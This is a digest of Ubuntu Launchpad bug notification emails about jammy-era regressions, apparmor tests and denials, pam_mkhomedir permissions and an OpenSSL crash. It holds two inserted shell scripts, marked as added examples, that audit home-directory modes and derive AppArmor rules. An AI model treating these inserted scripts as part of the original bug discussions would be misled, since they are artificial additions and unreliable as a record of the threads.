Status in upower package in Ubuntu: New

Bug description:
After today's updates I can no longer run my Laptop in clamshell mode. I don't use a dock. I connect the second monitor via HDMI cable and an external keyboard/mouse via a USB hub. Usually I can just plug in the monitor and close the lid and the primary display will switch to the external monitor. Now it will default to Monitor 2 as part of the joint display. I also tested booting the machine and closing the lid but this still defaulted to the external monitor as the 2nd display.
ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: xorg 1:7.7+23ubuntu1
ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12
Uname: Linux 5.15.0-18-generic x86_64
ApportVersion: 2.20.11-0ubuntu78
Architecture: amd64
BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
CasperMD5CheckResult: pass
CompositorRunning: None
CurrentDesktop: ubuntu:GNOME
Date: Fri Feb 25 16:44:37 2022
DistUpgraded: Fresh install
DistroCodename: jammy
DistroVariant: ubuntu
ExtraDebuggingInterest: Yes, if not too technical
GraphicsCard: Intel Corporation HD Graphics 5500 [8086:1616] (rev 09) (prog-if 00 [VGA controller])
  Subsystem: Lenovo HD Graphics 5500 [17aa:2226]
InstallationDate: Installed on 2022-02-23 (1 days ago)
InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220202)
MachineType: LENOVO 20CLS3JN0F
ProcEnviron:
  LANGUAGE=en_NZ:en
  PATH=(custom, no user)
  XDG_RUNTIME_DIR=
  LANG=en_NZ.UTF-8
  SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-18-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7
SourcePackage: xorg
Symptom: display
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 03/05/2015
dmi.bios.release: 1.7
dmi.bios.vendor: LENOVO
dmi.bios.version: N10ET30W (1.07 )
dmi.board.asset.tag: Not Available
dmi.board.name: 20CLS3JN0F
dmi.board.vendor: LENOVO
dmi.board.version: SDK0E50510 WIN
dmi.chassis.asset.tag: No Asset Information
dmi.chassis.type: 10
dmi.chassis.vendor: LENOVO
dmi.chassis.version: None
dmi.ec.firmware.release: 1.9
dmi.modalias: dmi:bvnLENOVO:bvrN10ET30W(1.07):bd03/05/2015:br1.7:efr1.9:svnLENOVO:pn20CLS3JN0F:pvrThinkPadX250:rvnLENOVO:rn20CLS3JN0F:rvrSDK0E50510WIN:cvnLENOVO:ct10:cvrNone:skuLENOVO_MT_20CL_BU_Think_FM_ThinkPadX250:
dmi.product.family: ThinkPad X250
dmi.product.name: 20CLS3JN0F
dmi.product.sku: LENOVO_MT_20CL_BU_Think_FM_ThinkPad X250
dmi.product.version: ThinkPad X250
dmi.sys.vendor: LENOVO
version.compiz: compiz N/A
version.libdrm2: libdrm2 2.4.109-2ubuntu1
version.libgl1-mesa-dri: libgl1-mesa-dri 21.2.2-1ubuntu1
version.libgl1-mesa-glx: libgl1-mesa-glx N/A
version.xserver-xorg-core: xserver-xorg-core 2:1.20.14-1ubuntu1
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20200714-1ubuntu2
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-1build1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-settings-daemon/+bug/1962276/+subscriptions
[Touch-packages] [Bug 1962276] Re: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed
This appears to be caused (for me at least) by upower 0.99.16-1 - after upgrading today to 0.99.16-2 things are working again as expected.

** Also affects: upower (Ubuntu)
   Importance: Undecided
       Status: New

** Bug watch added: Debian Bug tracker #1006368
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006368

--
https://bugs.launchpad.net/bugs/1962276

Title:
[jammy] Laptop monitor does not turn off/disconnect when the lid is closed

Status in gnome-settings-daemon package in Ubuntu: New
Status in linux package in Ubuntu: Confirmed
Status in mutter package in Ubuntu: New
Status in upower package in Ubuntu: New
[Touch-packages] [Bug 1962036] Re: dbus was stopped during today's jammy update, breaking desktop
I hit this too - just reported https://bugs.launchpad.net/ubuntu/+source/gnome-shell/+bug/1962127 from the associated gnome-shell crash.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1962036

Title:
dbus was stopped during today's jammy update, breaking desktop

Status in dbus package in Ubuntu: Confirmed

Bug description:
Impact: logind stopped, so desktop stopped, ssh stopped, got no getty. Had to hard reset.

Today's jammy upgrade stopped dbus at 19:46:27

Feb 23 19:46:27 jak-t480s systemd[1]: Stopping D-Bus System Message Bus...

This should not happen. I don't know which package caused this, but presumably dbus should not be stoppable in the first place.

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: dbus 1.12.20-2ubuntu3
ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
Uname: Linux 5.15.0-22-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.11-0ubuntu78
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: GNOME
Date: Wed Feb 23 20:03:41 2022
InstallationDate: Installed on 2018-03-14 (1442 days ago)
InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180313)
RebootRequiredPkgs: Error: path contained symlinks.
SourcePackage: dbus
UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1962036/+subscriptions
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
Hmm so had to redo my merge after the 3.0.3-0ubuntu9 upload... see new bileto ticket/PPA for the current version of it https://bileto.ubuntu.com/#/ticket/4797

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1961196

Title:
apparmor autotest failure on jammy with linux 5.15

Status in apparmor package in Ubuntu: New
Status in apparmor source package in Jammy: New

Bug description:
[Impact]

test-aa-notify is also checking if the output of `aa-notify --help` matches a specific text. However it looks like this output has changed in jammy so the autopkgtest is reporting errors like this:

05:17:31 ERROR| [stderr] === test-aa-notify.py ===
05:17:31 ERROR| [stderr] .ssF.
05:17:31 ERROR| [stderr] ==
05:17:31 ERROR| [stderr] FAIL: test_help_contents (__main__.AANotifyTest)
05:17:31 ERROR| [stderr] Test output of help text
05:17:31 ERROR| [stderr] --
05:17:31 ERROR| [stderr] Traceback (most recent call last):
05:17:31 ERROR| [stderr] File "/tmp/testlibmse00lib/source/jammy/apparmor-3.0.3/utils/test/test-aa-notify.py", line 178, in test_help_contents
05:17:31 ERROR| [stderr] self.assertEqual(expected_output_is, output, result + output)
05:17:31 ERROR| [stderr] AssertionError: 'usag[189 chars]ptional arguments:\n -h, --helpsh[746 chars]de\n' != 'usag[189 chars]ptions:\n -h, --helpshow this hel[735 chars]de\n'
05:17:31 ERROR| [stderr] usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v]
05:17:31 ERROR| [stderr][-u USER] [-w NUM] [--debug]
05:17:31 ERROR| [stderr]
05:17:31 ERROR| [stderr] Display AppArmor notifications or messages for DENIED entries.
05:17:31 ERROR| [stderr]
05:17:31 ERROR| [stderr] - optional arguments:
05:17:31 ERROR| [stderr] + options:
05:17:31 ERROR| [stderr] -h, --helpshow this help message and exit
05:17:31 ERROR| [stderr] -p, --pollpoll AppArmor logs and display notifications
05:17:31 ERROR| [stderr] --display DISPLAY set the DISPLAY environment variable (might be needed if
05:17:31 ERROR| [stderr] sudo resets $DISPLAY)
05:17:31 ERROR| [stderr] -f FILE, --file FILE search FILE for AppArmor messages
05:17:31 ERROR| [stderr] -l, --since-last display stats since last login
05:17:31 ERROR| [stderr] -s NUM, --since-days NUM
05:17:31 ERROR| [stderr] show stats for last NUM days (can be used alone or with
05:17:31 ERROR| [stderr] -p)
05:17:31 ERROR| [stderr] -v, --verbose show messages with stats
05:17:31 ERROR| [stderr] -u USER, --user USER user to drop privileges to when not using sudo
05:17:31 ERROR| [stderr] -w NUM, --wait NUMwait NUM seconds before displaying notifications (with
05:17:31 ERROR| [stderr] -p)
05:17:31 ERROR| [stderr] --debug debug mode
05:17:31 ERROR| [stderr] : Got output "usage: aa-notify [-h] [-p] [--display DISPLAY] [-f FILE] [-l] [-s NUM] [-v]
05:17:31 ERROR| [stderr] [-u USER] [-w NUM] [--debug]

[Test case]

Simply run test-aa-notify.py from the autopkgtests.

[Fix]

Update the expected output returned by `aa-notify --help` in test-aa-notify.py.

[Regression potential]

This is just an autopkgtest, we may see regressions if the test is used with older versions of apparmor-notify. With newer versions there's no risk of regressions.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1961196/+subscriptions
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
FYI I am preparing this in https://bileto.ubuntu.com/#/ticket/4796 - I have included the original patch from arighi to fix the aa-notify tests too. Once britney looks happy with this I will upload it to jammy-proposed.

--
https://bugs.launchpad.net/bugs/1961196

Title:
apparmor autotest failure on jammy with linux 5.15

Status in apparmor package in Ubuntu: New
Status in apparmor source package in Jammy: New
[Touch-packages] [Bug 1961196] Re: apparmor autotest failure on jammy with linux 5.15
FYI I am working on merging apparmor-3.0.4 from debian unstable to jammy at the moment which should resolve this.

--
https://bugs.launchpad.net/bugs/1961196

Title:
apparmor autotest failure on jammy with linux 5.15

Status in apparmor package in Ubuntu: New
Status in apparmor source package in Jammy: New
[Touch-packages] [Bug 1957781] Re: when i upgrade my package ask me yes or no ?
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

** Package changed: ubuntu => apt (Ubuntu)

-- 
https://bugs.launchpad.net/bugs/1957781

Title: when i upgrade my package ask me yes or no ?

Status in apt package in Ubuntu: New

Bug description:

ubuntu 21.10
use sudo apt upgrade

toshiba@toshiba-Satellite-C850-B908:~$ sudo apt upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following NEW packages will be installed:
  linux-headers-5.13.0-25 linux-headers-5.13.0-25-generic linux-image-5.13.0-25-generic
  linux-modules-5.13.0-25-generic linux-modules-extra-5.13.0-25-generic
The following packages will be upgraded:
  ghostscript ghostscript-x gir1.2-javascriptcoregtk-4.0 gir1.2-webkit2-4.0 libexiv2-27
  libfprint-2-2 libgs9 libgs9-common libjavascriptcoregtk-4.0-18 libnss-systemd libpam-systemd
  libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5widgets5 libsystemd0 libudev1
  libwebkit2gtk-4.0-37 linux-generic-hwe-20.04 linux-headers-generic-hwe-20.04
  linux-image-generic-hwe-20.04 linux-libc-dev openssh-client qt5-gtk-platformtheme systemd
  systemd-sysv systemd-timesyncd udev
29 upgraded, 5 newly installed, 0 to remove and 0 not upgraded.
27 standard security updates
Need to get 148 MB of archives.
After this operation, 504 MB of additional disk space will be used.
Do you want to continue? [Y/n] 1
Get:1 http://sy.archive.ubuntu.com/ubuntu impish-updates/main amd64 systemd-timesyncd amd64 248.3-1ubuntu8.2 [30.8 kB]
--

So I typed 1, not y or yes, and the upgrade began? Is that normal? I mean, using 1 as yes?
[Touch-packages] [Bug 1957024] [NEW] pam-mkhomedir does not honor private home directories
Public bug reported:

As reported in https://discourse.ubuntu.com/t/private-home-directories-for-ubuntu-21-04-onwards/19533/13:

A common situation is to have a central set of users (e.g. in LDAP) and use pam_mkhomedir.so to create the home directory when the user first logs in. These changes do not cover this situation. The default configuration of pam_mkhomedir.so will result in a home directory created with 0755 permissions.

To make pam_mkhomedir.so create a home directory by default with permissions consistent with the other tools, a umask argument can be added to the pam_mkhomedir.so module in the file /usr/share/pam-configs/mkhomedir. I believe this would have to be done before enabling the module. The file is part of the libpam-modules package.

** Affects: pam (Ubuntu)
   Importance: Undecided
   Status: New

-- 
https://bugs.launchpad.net/bugs/1957024

Title: pam-mkhomedir does not honor private home directories

Status in pam package in Ubuntu: New
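As an added illustration (not part of the bug report or of the pam package), the shell check below flags home directories that are more permissive than the 0750 private-home default and derives the umask value a pam_mkhomedir.so line would need to create them that way; the directories it audits are a constructed fixture in a temporary directory, standing in for /home.

```shell
#!/bin/sh
# Added example, not from the bug report: audit home directories for modes
# looser than the private-home default (0750) and compute the matching umask.

# Octal permission bits of a directory (GNU stat, falling back to BSD stat).
dir_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Succeeds when the mode grants any bit not contained in 0750, i.e. any
# access for "other" or write access for the group. Setuid/setgid/sticky
# digits are stripped first so that 2750 is still treated as private.
mode_is_loose() {
    m=$(printf '%s' "$1" | sed 's/.*\(...\)$/\1/')   # keep the last three digits
    [ $(( 0$m & ~0750 )) -ne 0 ]
}

# umask that makes a directory created with mode 0777 & ~umask come out as
# exactly the requested mode (pam_mkhomedir.so applies its umask= option
# that way, so 0750 needs umask=0027 and 0700 needs umask=0077).
umask_for_mode() {
    printf '%04o\n' $(( 0777 & ~0$1 ))
}

# Print "<dir> <mode> LOOSE|ok" for every directory directly under $1.
audit_homes() {
    for d in "$1"/*/; do
        [ -d "$d" ] || continue
        d=${d%/}
        mode=$(dir_mode "$d")
        if mode_is_loose "$mode"; then
            printf '%s %s LOOSE\n' "$d" "$mode"
        else
            printf '%s %s ok\n' "$d" "$mode"
        fi
    done
}

# Constructed fixture: one directory as a default pam_mkhomedir.so (umask 0022)
# would create it, one with the private-home default.
demo_root=$(mktemp -d)
mkdir -m 755 "$demo_root/legacy"
mkdir -m 750 "$demo_root/private"
audit_homes "$demo_root"
echo "suggested module argument: pam_mkhomedir.so umask=$(umask_for_mode 750)"
rm -rf "$demo_root"
```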
[Touch-packages] [Bug 1941752] Re: Regression: exiv2 0.27.3-3ubuntu1.5 makes Gwenview crash when opening images exported by darktable
@leosilva - as you did the original update for exiv2 could you please sponsor the attached debdiff? Thanks.

** Changed in: exiv2 (Ubuntu)
     Assignee: (unassigned) => Ubuntu Security Team (ubuntu-security)

-- 
https://bugs.launchpad.net/bugs/1941752

Title: Regression: exiv2 0.27.3-3ubuntu1.5 makes Gwenview crash when opening images exported by darktable

Status in Gwenview: Fix Released
Status in exiv2 package in Ubuntu: Confirmed
Status in gwenview package in Ubuntu: Confirmed

Bug description:

Since the recent security update of exiv2, Gwenview crashes when trying to open image files that got exported by darktable.

Steps to reproduce:
* Make a test installation of Kubuntu 21.04 in VirtualBox
* Install all updates
* Install darktable
* Copy one of the images in /usr/share/wallpapers (or any other image) to your home directory and open it with darktable
* Within darktable, export a copy of the image (no need to do any actual modifications)
* Try to open that copy with Gwenview. Gwenview will crash.

I'm attaching a crash report hinting that this is related to exiv2.

Temporary workaround: If I downgrade libexiv2-27 to 0.27.3-3ubuntu1.4, Gwenview doesn't crash, so it seems the crash is related to changes in 0.27.3-3ubuntu1.5. I don't know if the underlying cause is actually some bug in exiv2, Gwenview or darktable.

Kind regards,
Jan

ProblemType: Bug
DistroRelease: Ubuntu 21.04
Package: libexiv2-27 0.27.3-3ubuntu1.5
ProcVersionSignature: Ubuntu 5.11.0-31.33-generic 5.11.22
Uname: Linux 5.11.0-31-generic x86_64
ApportVersion: 2.20.11-0ubuntu65.1
Architecture: amd64
CasperMD5CheckResult: pass
CurrentDesktop: KDE
Date: Thu Aug 26 15:16:47 2021
InstallationDate: Installed on 2021-08-26 (0 days ago)
InstallationMedia: Kubuntu 21.04 "Hirsute Hippo" - Release amd64 (20210420)
SourcePackage: exiv2
UpgradeStatus: No upgrade log present (probably fresh install)
[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages
FWIW I can't reproduce this on a RPi 4 running the aarch64/arm64 Ubuntu 20.04 LTS image:

ubuntu@rpi4:~$ wget https://wrapdb.mesonbuild.com/v2/libuv_1.42.0-1/get_patch
--2021-12-07 05:50:01--  https://wrapdb.mesonbuild.com/v2/libuv_1.42.0-1/get_patch
Resolving wrapdb.mesonbuild.com (wrapdb.mesonbuild.com)... 138.201.247.118
Connecting to wrapdb.mesonbuild.com (wrapdb.mesonbuild.com)|138.201.247.118|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://github.com/mesonbuild/wrapdb/releases/download/libuv_1.42.0-1/libuv_1.42.0-1_patch.zip [following]
--2021-12-07 05:50:03--  https://github.com/mesonbuild/wrapdb/releases/download/libuv_1.42.0-1/libuv_1.42.0-1_patch.zip
Resolving github.com (github.com)... 13.236.229.21
Connecting to github.com (github.com)|13.236.229.21|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/236250352/46c49bec-514b-4411-afe8-46ac8cb2e82f?X-Amz-Algorithm=AWS4-HMAC-SHA256=AKIAIWNJYAX4CSVEH53A%2F20211207%2Fus-east-1%2Fs3%2Faws4_request=20211207T054758Z=300=504c83b4d0c3567dc2f509362714a5b5709951655612c5665ca7d3e1f09050c5=host_id=0_id=0_id=236250352=attachment%3B%20filename%3Dlibuv_1.42.0-1_patch.zip=application%2Foctet-stream [following]
--2021-12-07 05:50:03--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/236250352/46c49bec-514b-4411-afe8-46ac8cb2e82f?X-Amz-Algorithm=AWS4-HMAC-SHA256=AKIAIWNJYAX4CSVEH53A%2F20211207%2Fus-east-1%2Fs3%2Faws4_request=20211207T054758Z=300=504c83b4d0c3567dc2f509362714a5b5709951655612c5665ca7d3e1f09050c5=host_id=0_id=0_id=236250352=attachment%3B%20filename%3Dlibuv_1.42.0-1_patch.zip=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5146 (5.0K) [application/octet-stream]
Saving to: ‘get_patch’

get_patch  100%[=>]  5.03K  --.-KB/s  in 0.009s

2021-12-07 05:50:04 (590 KB/s) - ‘get_patch’ saved [5146/5146]

ubuntu@rpi4:~$ dpkg -l openssl
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name      Version            Architecture  Description
+++-=========-==================-=============-=====================================================
ii  openssl   1.1.1f-1ubuntu2.9  arm64         Secure Sockets Layer toolkit - cryptographic utility

ubuntu@rpi4:~$ uname -a
Linux rpi4 5.4.0-1047-raspi #52-Ubuntu SMP PREEMPT Wed Nov 24 08:16:38 UTC 2021 aarch64 aarch64 aarch64 GNU/Linux

Can you please provide more details on what hardware platform is being used in your case and what Ubuntu version / openssl version is in use? The meson github issue appears to mention Ubuntu 20.04 but some more details would be useful.

** Changed in: openssl (Ubuntu)
       Status: New => Incomplete

-- 
https://bugs.launchpad.net/bugs/1953301

Title: Segfault on AArch64 caused by OpenSSL affecting numerous packages

Status in openssl package in Ubuntu: Incomplete

Bug description:

OpenSSL causes crashes when reaching to some URLs on AArch64 platform, affecting Ubuntu, but not Fedora for instance.

Initially reported in https://mediasoup.discourse.group/t/mediasoup-worker-default-make-failed/3647/12, more details and reproductions in https://github.com/mesonbuild/meson/issues/9690

Affects curl, wget, python and probably everything else.
[Touch-packages] [Bug 1953301] Re: Segfault on AArch64 caused by OpenSSL affecting numerous packages
** Information type changed from Private Security to Public Security

-- 
https://bugs.launchpad.net/bugs/1953301

Title: Segfault on AArch64 caused by OpenSSL affecting numerous packages

Status in openssl package in Ubuntu: New
[Touch-packages] [Bug 1953428] [NEW] /etc/PackageKit/Vendor.conf specifies invalid CodecUrl
Public bug reported:

CodecUrl in /etc/PackageKit/Vendor.conf on Impish at least currently has:

http://shop.canonical.com/index.php?cPath=19=f1e370ea7563ed5e654c10450364ff24

shop.canonical.com does not have a DNS record and has been dead for a long time, so this should be removed.

** Affects: packagekit (Ubuntu)
   Importance: Undecided
   Status: New

-- 
https://bugs.launchpad.net/bugs/1953428

Title: /etc/PackageKit/Vendor.conf specifies invalid CodecUrl

Status in packagekit package in Ubuntu: New
[Touch-packages] [Bug 1951161] Re: Please merge shadow 1:4.8.1-2 (main) from Debian unstable
I think the changelog entry should still list the private home dirs change for login.defs under Remaining changes.

-- 
https://bugs.launchpad.net/bugs/1951161

Title: Please merge shadow 1:4.8.1-2 (main) from Debian unstable

Status in shadow package in Ubuntu: Confirmed

Bug description:

This merge is necessary because there are changes present in Ubuntu that are not present in Debian.
[Touch-packages] [Bug 1949316] [NEW] kmod modprobe.d scripts are named with non-inclusive language
Public bug reported:

The kmod package ships with a number of files in /etc/modprobe.d which have non-inclusive names:

$ dpkg -L kmod | grep blacklist
/etc/modprobe.d/blacklist-ath_pci.conf
/etc/modprobe.d/blacklist-firewire.conf
/etc/modprobe.d/blacklist-framebuffer.conf
/etc/modprobe.d/blacklist-rare-network.conf
/etc/modprobe.d/blacklist.conf

These should be renamed using the term denylist instead. Similarly, they should accept the term `denylist` rather than `blacklist` to specify modules that should not be loaded / aliases that should be ignored etc.

** Affects: kmod (Ubuntu)
   Importance: Undecided
   Status: New

-- 
https://bugs.launchpad.net/bugs/1949316

Title: kmod modprobe.d scripts are named with non-inclusive language

Status in kmod package in Ubuntu: New
[Touch-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Is there any option to do this via portals - i.e. can evince use https://flatpak.github.io/xdg-desktop-portal/portal-docs.html#gdbus-org.freedesktop.portal.OpenURI to open the URI? Would this then allow avoiding going via xdg-open?

-- 
https://bugs.launchpad.net/bugs/1794064

Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in apparmor package in Ubuntu: Confirmed
Status in evince package in Ubuntu: Triaged

Bug description:

This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

This is not a recent regression; it's not working on bionic either.

ProblemType: Bug
DistroRelease: Ubuntu 18.10
Package: evince 3.30.0-2
ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
Uname: Linux 4.18.0-7-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.10-0ubuntu11
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Mon Sep 24 12:28:06 2018
EcryptfsInUse: Yes
InstallationDate: Installed on 2016-07-02 (813 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
SourcePackage: evince
UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago)
modified.conffile..etc.apparmor.d.abstractions.evince: [modified]
mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158
[Touch-packages] [Bug 1944436] Re: Please backport support for "close_range" syscall
Can you please post a simple reproducer?

-- 
https://bugs.launchpad.net/bugs/1944436

Title: Please backport support for "close_range" syscall

Status in libseccomp package in Ubuntu: New

Bug description:

Please backport support for the "close_range" syscall .. may be as simple as cherrypicking https://github.com/seccomp/libseccomp/commit/01e5750e7c84bb14e5a5410c924bed519209db06 from upstream.

I've hit problems running buildah in a systemd-nspawn container, but this will probably affect people trying to run modern code in other container systems as well, e.g. docker.

ProblemType: Bug
DistroRelease: Ubuntu 20.04
Package: libseccomp2 2.5.1-1ubuntu1~20.04.1
ProcVersionSignature: Ubuntu 5.4.0-84.94-generic 5.4.133
Uname: Linux 5.4.0-84-generic x86_64
ApportVersion: 2.20.11-0ubuntu27.20
Architecture: amd64
CasperMD5CheckResult: skip
CurrentDesktop: Xpra
Date: Tue Sep 21 15:10:54 2021
InstallationDate: Installed on 2017-01-08 (1717 days ago)
InstallationMedia: Xubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
SourcePackage: libseccomp
UpgradeStatus: Upgraded to focal on 2021-09-02 (19 days ago)
[Touch-packages] [Bug 1938938] Re: apparmor denials for gnutls configuration
Hmm, there is also a crypto abstraction https://gitlab.com/apparmor/apparmor/-/blob/master/profiles/apparmor.d/abstractions/crypto - and this is included in the base abstraction, so perhaps this *might* be another candidate..?

-- 
https://bugs.launchpad.net/bugs/1938938

Title: apparmor denials for gnutls configuration

Status in apparmor package in Ubuntu: New

Bug description:

The gnutls library can be configured using /etc/gnutls/config, for example to allow small keys and TLS versions below v1.2. However, if an application is confined and has an apparmor profile and uses gnutls, it will ignore such a file if it is not allowed to read it. For example:

[  382.586297] audit: type=1400 audit(1628068663.214:162): apparmor="DENIED" operation="open" profile="msmtp" name="/etc/gnutls/config" pid=18621 comm="sendmail" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[25379.358122] audit: type=1400 audit(1628093660.328:163): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/etc/gnutls/config" pid=53262 comm="evince" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[25460.754092] audit: type=1400 audit(1628093741.726:164): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/gnutls/config" pid=53347 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0

How can we allow reading /etc/gnutls/config for all apps that use gnutls?
[Touch-packages] [Bug 1938938] Re: apparmor denials for gnutls configuration
We already have an abstraction (i.e. a policy fragment) for openssl - https://gitlab.com/apparmor/apparmor/-/blob/master/profiles/apparmor.d/abstractions/openssl - perhaps a similar one should be created for gnutls, and then this can be #include'd into the profiles for the various applications that wish to use gnutls.

-- 
https://bugs.launchpad.net/bugs/1938938

Title: apparmor denials for gnutls configuration

Status in apparmor package in Ubuntu: New
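As an added example (not from this thread or the apparmor project), the shell script below takes kernel audit lines like the ones quoted in the bug report, extracts the denied file accesses, and prints both the file rule a gnutls abstraction would need to carry and the list of profiles that would have to include it; the three audit lines are constructed from those in the report, and the abstraction name `abstractions/gnutls` is the one proposed in the thread, not an existing file.

```shell
#!/bin/sh
# Added example, not part of the bug thread: derive abstraction rules from
# AppArmor DENIED audit lines. The sample below is constructed from the
# denials quoted in the report.
SAMPLE_DENIALS='[  382.586297] audit: type=1400 audit(1628068663.214:162): apparmor="DENIED" operation="open" profile="msmtp" name="/etc/gnutls/config" pid=18621 comm="sendmail" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[25379.358122] audit: type=1400 audit(1628093660.328:163): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/etc/gnutls/config" pid=53262 comm="evince" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[25460.754092] audit: type=1400 audit(1628093741.726:164): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/gnutls/config" pid=53347 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0'

# Extract the value of one key="value" field from a single audit line.
# The leading whitespace anchor keeps e.g. "name=" from matching inside
# another key that happens to end in the same letters.
field() {
    printf '%s\n' "$2" | sed -n "s/.*[[:space:]]$1=\"\([^\"]*\)\".*/\1/p"
}

# Read audit lines on stdin; for every DENIED file open, print
# "profile<TAB>path<TAB>denied_mask". Other events are ignored.
denied_file_access() {
    while IFS= read -r line; do
        case $line in
            *'apparmor="DENIED"'*'operation="open"'*) ;;
            *) continue ;;
        esac
        printf '%s\t%s\t%s\n' "$(field profile "$line")" \
            "$(field name "$line")" "$(field denied_mask "$line")"
    done
}

# One AppArmor file rule per distinct (path, mask) pair, e.g.
#   /etc/gnutls/config r,
# which is the body a proposed abstractions/gnutls fragment would carry.
suggest_rules() {
    denied_file_access | cut -f2,3 | sort -u | awk -F'\t' '{ printf "%s %s,\n", $1, $2 }'
}

# Profiles that produced denials and so would need "#include <abstractions/gnutls>".
affected_profiles() {
    denied_file_access | cut -f1 | sort -u
}

echo "# candidate abstraction rules:"
printf '%s\n' "$SAMPLE_DENIALS" | suggest_rules
echo "# profiles that would include the abstraction:"
printf '%s\n' "$SAMPLE_DENIALS" | affected_profiles
```

Feed real data with `journalctl -k | suggest_rules` (or `dmesg`), and review the resulting rules before adding them to policy.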